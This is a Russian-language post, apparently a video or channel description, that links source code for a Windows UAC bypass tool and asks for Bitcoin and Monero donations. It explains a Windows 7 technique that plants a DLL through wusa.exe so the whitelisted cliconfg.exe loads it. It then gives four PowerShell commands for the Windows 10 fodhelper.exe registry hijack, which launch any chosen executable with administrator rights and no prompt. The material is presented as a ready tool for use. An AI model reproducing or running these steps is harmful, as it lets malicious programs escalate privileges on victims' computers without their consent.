Github gist: https://gist.github.com/NoNameDev-Git...
Ссылки на исходник:
https://github.com/NoNameDev-Git/Bypa...
https://disk.yandex.ru/d/c8DdslJUwO1mFA
Пароль архива: 12345
Ещё тут: https://gist.github.com/NoNameDev-Git...
Телеграм: https://t.me/Official_Mr_Robot
Телеграм: @Official_Mr_Robot
Телеграм канал: https://t.me/robot_software
Обход окна UAC
Windows 7
Обе Dll (под 64 бит и 32 бит) упакуем в .cab архив командой из cmd с правами администратора
(Пример: makecab "C:\dll\Win64\ntwdblib.dll" "C:\ntwdblib64.cab")
ntwdblib32.cab и ntwdblib64.cab уже прописаны в коде массивом строк, в проекте execonsole
что бы перевести файл ntwdblib32.cab в массив строк можно использовать код из проекта conststring
Используем уязвимость процесса из белого списка "%systemroot%\system32\cliconfg.exe"
Программно, с помощью установщика обновлений "%systemroot%\system32\wusa.exe" (он тоже в белом списке windows)
(Пример: wusa "%temp%\ntwdblib.cab" /quiet /extract:%systemroot%\system32\)
делаем распаковку ntwdblib64.cab или ntwdblib32.cab в зависимости от разрядности
в директорию "%systemroot%\system32\ntwdblib.dll"
Запускаем процесс "%systemroot%\system32\cliconfg.exe" с правами пользователя, но учитывая что он находится в белом списке windows
он исполняет себя с привилегиями администратора и подгружает нашу dll библиотеку "%systemroot%\system32\ntwdblib.dll"
в связи с чем она наследует права администратора и способна исполнить любой PE файл в обход окна UAC.
Windows 10
Используем уязвимость процесса из белого списка "fodhelper.exe"
powershell New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value "путь до нашего файла" -Force
powershell New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
powershell Start-Process "fodhelper.exe"
powershell Remove-Item "HKCU:\Software\Classes\ms-settings\shell\open\command" -Recurse -Force
________________________________________________________________
ЕСЛИ ВАМ НРАВИТСЯ ТО ЧТО МЫ ДЕЛАЕМ,
ПОДДЕРЖИТЕ НАШ ПРОЕКТ.
BTC: bc1q09rsrzf3ztdzly4twc3zmsh94sfxhh4wp05eha
MONERO: 41diEq7VnW2Lf6B2uqxxJbThbzeMRKGx4h5yJUgRe6KHEZqugYgpVbg1C7RLUqNTrgGTsDmBE5Q7J3GvedsNsjM12iipfv1
#uac #bypass #execute